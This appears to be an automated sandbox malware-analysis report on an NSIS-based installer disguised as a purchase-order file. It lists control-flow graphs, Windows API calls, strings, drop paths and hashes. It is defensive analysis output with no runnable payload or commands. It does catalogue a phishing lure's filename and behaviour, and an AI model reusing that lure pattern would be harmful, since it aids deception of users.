                                                              • Opcode Fuzzy Hash: f73c030cd55cfe5a8dab8208d1cd7d95fcf8e01722a7b63f144a17743666d228
                                                              • Instruction Fuzzy Hash: A541C171900A15E6CB217B61CC49BAF7678EF81768F20817BF801B61D1D77C49829EAE

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 545 401752-401777 call 402b3a call 405a4e 550 401781-401793 call 405f8c call 4059d7 lstrcatW 545->550 551 401779-40177f call 405f8c 545->551 556 401798-401799 call 406220 550->556 551->556 560 40179e-4017a2 556->560 561 4017a4-4017ae call 4062cf 560->561 562 4017d5-4017d8 560->562 570 4017c0-4017d2 561->570 571 4017b0-4017be CompareFileTime 561->571 564 4017e0-4017fc call 405bf8 562->564 565 4017da-4017db call 405bd3 562->565 572 401870-401899 call 405234 call 403062 564->572 573 4017fe-401801 564->573 565->564 570->562 571->570 587 4018a1-4018ad SetFileTime 572->587 588 40189b-40189f 572->588 574 401852-40185c call 405234 573->574 575 401803-401841 call 405f8c * 2 call 405fae call 405f8c call 405768 573->575 585 401865-40186b 574->585 575->560 607 401847-401848 575->607 589 4029d0 585->589 591 4018b3-4018be CloseHandle 587->591 588->587 588->591 594 4029d2-4029d6 589->594 592 4018c4-4018c7 591->592 593 4029c7-4029ca 591->593 596 4018c9-4018da call 405fae lstrcatW 592->596 597 4018dc-4018df call 405fae 592->597 593->589 603 4018e4-402243 call 405768 596->603 597->603 603->594 607->585 609 40184a-40184b 607->609 609->574
                                                              APIs
                                                              • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\incontemptible\koput,?,?,00000031), ref: 00401793
                                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\incontemptible\koput,?,?,00000031), ref: 004017B8
                                                                • Part of subcall function 00405F8C: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F99
                                                                • Part of subcall function 00405234: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                • Part of subcall function 00405234: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                • Part of subcall function 00405234: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040528F
                                                                • Part of subcall function 00405234: SetWindowTextW.USER32(004216C8,004216C8), ref: 004052A1
                                                                • Part of subcall function 00405234: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                • Part of subcall function 00405234: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                • Part of subcall function 00405234: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsh620C.tmp$C:\Users\user\AppData\Local\Temp\nsh620C.tmp\System.dll$C:\Users\user\AppData\Roaming\incontemptible\koput$Call
                                                              • API String ID: 1941528284-1292691082
                                                              • Opcode ID: 604e78bc53d106bf4f0f62d85c02bc11bcf8d6cf611c9ccab56a67e3bf51c5d9
                                                              • Instruction ID: 76b650aa9cc6b75c6122964d1cb95a98820e0ebeeaa58c8a998697c6af8370a7
                                                              • Opcode Fuzzy Hash: 604e78bc53d106bf4f0f62d85c02bc11bcf8d6cf611c9ccab56a67e3bf51c5d9
                                                              • Instruction Fuzzy Hash: 6A41A371904509BACF117BB5CC45DAF36B9EF05368F20423BF421B21E1D73C8A419A6E
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,00425738,C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,00405B28,C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,?,?,75572EE0,00405834,?,C:\Users\user\AppData\Local\Temp\,75572EE0), ref: 004062DA
                                                              • FindClose.KERNEL32(00000000), ref: 004062E6
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\nsu68B6.tmp, xrefs: 004062CF
                                                              • 8WB, xrefs: 004062D0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID: 8WB$C:\Users\user\AppData\Local\Temp\nsu68B6.tmp
                                                              • API String ID: 2295610775-2168928731
                                                              • Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                              • Instruction ID: 1ee065d6e3812395a970a313fce2833205c85b6b9f4a8d8b1e1fbb38817291b4
                                                              • Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                              • Instruction Fuzzy Hash: BED0123198A030EBC20067786D0CC4B7A989B553317514ABAF426F63E0C7389C65969D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 05c614c4f20a384ebef59dc8ddd16a5626e9342178c9d40e40815452f54a0124
                                                              • Instruction ID: de185f48d860fff5590de95dd02018db6e9577308a0edf9c34ceb3d093010d57
                                                              • Opcode Fuzzy Hash: 05c614c4f20a384ebef59dc8ddd16a5626e9342178c9d40e40815452f54a0124
                                                              • Instruction Fuzzy Hash: A7F18870D00269CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A96CF44
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 00406308
                                                              • LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 00406313
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406324
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                              • String ID:
                                                              • API String ID: 310444273-0
                                                              • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                              • Instruction ID: 0f2d4e1e99ce60b709eb5bed4958ea521979334ca76cdededd91ec650e447dd0
                                                              • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                              • Instruction Fuzzy Hash: D5E0C236A08120ABC7124B209D48D6B77ACEFE9601305043AF906F6281D774AC229BE9

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 174 403cc2-403cd4 175 403e15-403e24 174->175 176 403cda-403ce0 174->176 178 403e73-403e88 175->178 179 403e26-403e6e GetDlgItem * 2 call 40419a SetClassLongW call 40140b 175->179 176->175 177 403ce6-403cef 176->177 180 403cf1-403cfe SetWindowPos 177->180 181 403d04-403d07 177->181 183 403ec8-403ecd call 4041e6 178->183 184 403e8a-403e8d 178->184 179->178 180->181 186 403d21-403d27 181->186 187 403d09-403d1b ShowWindow 181->187 192 403ed2-403eed 183->192 189 403ec0-403ec2 184->189 190 403e8f-403e9a call 401389 184->190 193 403d43-403d46 186->193 194 403d29-403d3e DestroyWindow 186->194 187->186 189->183 191 404167 189->191 190->189 211 403e9c-403ebb SendMessageW 190->211 199 404169-404170 191->199 197 403ef6-403efc 192->197 198 403eef-403ef1 call 40140b 192->198 202 403d48-403d54 SetWindowLongW 193->202 203 403d59-403d5f 193->203 200 404144-40414a 194->200 207 403f02-403f0d 197->207 208 404125-40413e DestroyWindow EndDialog 197->208 198->197 200->191 205 40414c-404152 200->205 202->199 209 403e02-403e10 call 404201 203->209 210 403d65-403d76 GetDlgItem 203->210 205->191 213 404154-40415d ShowWindow 205->213 207->208 214 403f13-403f60 call 405fae call 40419a * 3 GetDlgItem 207->214 208->200 209->199 215 403d95-403d98 210->215 216 403d78-403d8f SendMessageW IsWindowEnabled 210->216 211->199 213->191 244 403f62-403f67 214->244 245 403f6a-403fa6 ShowWindow KiUserCallbackDispatcher call 4041bc EnableWindow 214->245 219 403d9a-403d9b 215->219 220 403d9d-403da0 215->220 216->191 216->215 221 403dcb-403dd0 call 404173 219->221 222 403da2-403da8 220->222 223 403dae-403db3 220->223 221->209 225 403de9-403dfc SendMessageW 222->225 226 403daa-403dac 222->226 223->225 227 403db5-403dbb 223->227 225->209 226->221 230 403dd2-403ddb call 40140b 227->230 231 403dbd-403dc3 call 40140b 227->231 230->209 241 403ddd-403de7 230->241 240 403dc9 231->240 240->221 241->240 244->245 248 403fa8-403fa9 245->248 249 403fab 245->249 250 403fad-403fdb GetSystemMenu EnableMenuItem SendMessageW 248->250 249->250 251 403ff0 250->251 252 403fdd-403fee SendMessageW 250->252 253 403ff6-404034 call 4041cf call 405f8c lstrlenW call 405fae SetWindowTextW call 401389 251->253 252->253 253->192 262 40403a-40403c 253->262 262->192 263 404042-404046 262->263 264 404065-404079 DestroyWindow 263->264 265 404048-40404e 263->265 264->200 267 40407f-4040ac CreateDialogParamW 264->267 265->191 266 404054-40405a 265->266 266->192 268 404060 266->268 267->200 269 4040b2-404109 call 40419a GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 267->269 268->191 269->191 274 40410b-40411e ShowWindow call 4041e6 269->274 276 404123 274->276 276->200
                                                              APIs
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                              • ShowWindow.USER32(?), ref: 00403D1B
                                                              • DestroyWindow.USER32 ref: 00403D2F
                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                              • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                              • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                              • GetDlgItem.USER32(?,?), ref: 00403E35
                                                              • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                              • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403EAA
                                                              • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                              • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F83
                                                              • EnableWindow.USER32(?,?), ref: 00403F9E
                                                              • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403FB4
                                                              • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                              • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00403FD3
                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                              • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                              • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                              • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                              • String ID: &B
                                                              • API String ID: 3282139019-3208460036
                                                              • Opcode ID: d331890cd791021983203c44155cc69af11bbce5f8b1e17c8e6a12c02c090248
                                                              • Instruction ID: 96835d82c370a0a6a0181c3c86cda1860f3d4ae5ef3a20f552a9e9ef927ba2a4
                                                              • Opcode Fuzzy Hash: d331890cd791021983203c44155cc69af11bbce5f8b1e17c8e6a12c02c090248
                                                              • Instruction Fuzzy Hash: DEC1B371A04200BBDB206F61ED49E3B3AA8FB95705F40093EF601B51F1C7799892DB2E

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 277 40391f-403937 call 4062f6 280 403939-403949 call 405ed3 277->280 281 40394b-403982 call 405e59 277->281 290 4039a5-4039ce call 403bf5 call 405adf 280->290 286 403984-403995 call 405e59 281->286 287 40399a-4039a0 lstrcatW 281->287 286->287 287->290 295 403a60-403a68 call 405adf 290->295 296 4039d4-4039d9 290->296 302 403a76-403a9b LoadImageW 295->302 303 403a6a-403a71 call 405fae 295->303 296->295 297 4039df-403a07 call 405e59 296->297 297->295 304 403a09-403a0d 297->304 306 403b1c-403b24 call 40140b 302->306 307 403a9d-403acd RegisterClassW 302->307 303->302 308 403a1f-403a2b lstrlenW 304->308 309 403a0f-403a1c call 405a04 304->309 321 403b26-403b29 306->321 322 403b2e-403b39 call 403bf5 306->322 310 403ad3-403b17 SystemParametersInfoW CreateWindowExW 307->310 311 403beb 307->311 315 403a53-403a5b call 4059d7 call 405f8c 308->315 316 403a2d-403a3b lstrcmpiW 308->316 309->308 310->306 313 403bed-403bf4 311->313 315->295 316->315 320 403a3d-403a47 GetFileAttributesW 316->320 325 403a49-403a4b 320->325 326 403a4d-403a4e call 405a23 320->326 321->313 330 403bc2-403bc3 call 405307 322->330 331 403b3f-403b5c ShowWindow LoadLibraryW 322->331 325->315 325->326 326->315 337 403bc8-403bca 330->337 332 403b65-403b77 GetClassInfoW 331->332 333 403b5e-403b63 LoadLibraryW 331->333 335 403b79-403b89 GetClassInfoW RegisterClassW 332->335 336 403b8f-403bb2 DialogBoxParamW call 40140b 332->336 333->332 335->336 343 403bb7-403bc0 call 40386f 336->343 339 403be4-403be6 call 40140b 337->339 340 403bcc-403bd2 337->340 339->311 340->321 341 403bd8-403bdf call 40140b 340->341 341->321 343->313
                                                              APIs
                                                                • Part of subcall function 004062F6: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 00406308
                                                                • Part of subcall function 004062F6: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 00406313
                                                                • Part of subcall function 004062F6: GetProcAddress.KERNEL32(00000000,?), ref: 00406324
                                                              • lstrcatW.KERNEL32(1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75573420,00000000,"C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe"), ref: 004039A0
                                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\incontemptible\koput,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A20
                                                              • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\incontemptible\koput,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                              • GetFileAttributesW.KERNEL32(Call), ref: 00403A3E
                                                              • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\incontemptible\koput), ref: 00403A87
                                                                • Part of subcall function 00405ED3: wsprintfW.USER32 ref: 00405EE0
                                                              • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ADC
                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                              • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403B58
                                                              • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                              • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                              • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                              • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: "C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\incontemptible\koput$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                              • API String ID: 914957316-1221441444
                                                              • Opcode ID: 3fe1317be8225d5207d3262feaceadd220e403ae806b79703d05bab37dc2ed14
                                                              • Instruction ID: fe5ebf8e7a3d3daaf9cbba1b4cb9a1e73201f421c795aceacce4267b8607b26b
                                                              • Opcode Fuzzy Hash: 3fe1317be8225d5207d3262feaceadd220e403ae806b79703d05bab37dc2ed14
                                                              • Instruction Fuzzy Hash: EB61A370644200BED720AF669C46F2B3A6CEB84749F40453FF945B62E2D7786902CA3E

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 348 402dbc-402e0a GetTickCount GetModuleFileNameW call 405bf8 351 402e16-402e44 call 405f8c call 405a23 call 405f8c GetFileSize 348->351 352 402e0c-402e11 348->352 360 402f34-402f42 call 402d1a 351->360 361 402e4a-402e61 351->361 353 40305b-40305f 352->353 367 403013-403018 360->367 368 402f48-402f4b 360->368 363 402e63 361->363 364 402e65-402e72 call 4032f9 361->364 363->364 372 402e78-402e7e 364->372 373 402fcf-402fd7 call 402d1a 364->373 367->353 370 402f77-402fc3 GlobalAlloc call 406412 call 405c27 CreateFileW 368->370 371 402f4d-402f65 call 40330f call 4032f9 368->371 397 402fc5-402fca 370->397 398 402fd9-403009 call 40330f call 403062 370->398 371->367 400 402f6b-402f71 371->400 375 402e80-402e98 call 405bb3 372->375 376 402efe-402f02 372->376 373->367 384 402f0b-402f11 375->384 393 402e9a-402ea1 375->393 383 402f04-402f0a call 402d1a 376->383 376->384 383->384 385 402f13-402f21 call 4063a4 384->385 386 402f24-402f2e 384->386 385->386 386->360 386->361 393->384 399 402ea3-402eaa 393->399 397->353 408 40300e-403011 398->408 399->384 401 402eac-402eb3 399->401 400->367 400->370 401->384 403 402eb5-402ebc 401->403 403->384 405 402ebe-402ede 403->405 405->367 407 402ee4-402ee8 405->407 409 402ef0-402ef8 407->409 410 402eea-402eee 407->410 408->367 411 40301a-40302b 408->411 409->384 412 402efa-402efc 409->412 410->360 410->409 413 403033-403038 411->413 414 40302d 411->414 412->384 415 403039-40303f 413->415 414->413 415->415 416 403041-403059 call 405bb3 415->416 416->353
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00402DD0
                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe,00000400), ref: 00402DEC
                                                                • Part of subcall function 00405BF8: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe,80000000,00000003), ref: 00405BFC
                                                                • Part of subcall function 00405BF8: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405C1E
                                                              • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe,C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe,80000000,00000003), ref: 00402E35
                                                              • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7C
                                                              Strings
                                                              • "C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe", xrefs: 00402DC5
                                                              • Inst, xrefs: 00402EA3
                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                              • Null, xrefs: 00402EB5
                                                              • Error launching installer, xrefs: 00402E0C
                                                              • soft, xrefs: 00402EAC
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DC9, 00402F94
                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                              • C:\Users\user\Desktop, xrefs: 00402E17, 00402E1C, 00402E22
                                                              • C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, xrefs: 00402DD6, 00402DE5, 00402DF9, 00402E16
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                              • String ID: "C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                              • API String ID: 2803837635-3658020886
                                                              • Opcode ID: d5a77cc6bee4d90e7eda19427a8a4cf0714f505a664e78c7155da71c5f6bc0b2
                                                              • Instruction ID: 4e3209b53bdebe8ba6f789b0e0a530dabd6f5a0a3926ba0fa2d0dbc3b843d87d
                                                              • Opcode Fuzzy Hash: d5a77cc6bee4d90e7eda19427a8a4cf0714f505a664e78c7155da71c5f6bc0b2
                                                              • Instruction Fuzzy Hash: 4D610631941205ABDB209FA4DD85B9E3BB8EB04354F20457BF604B72D2C7BC9E419BAD

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
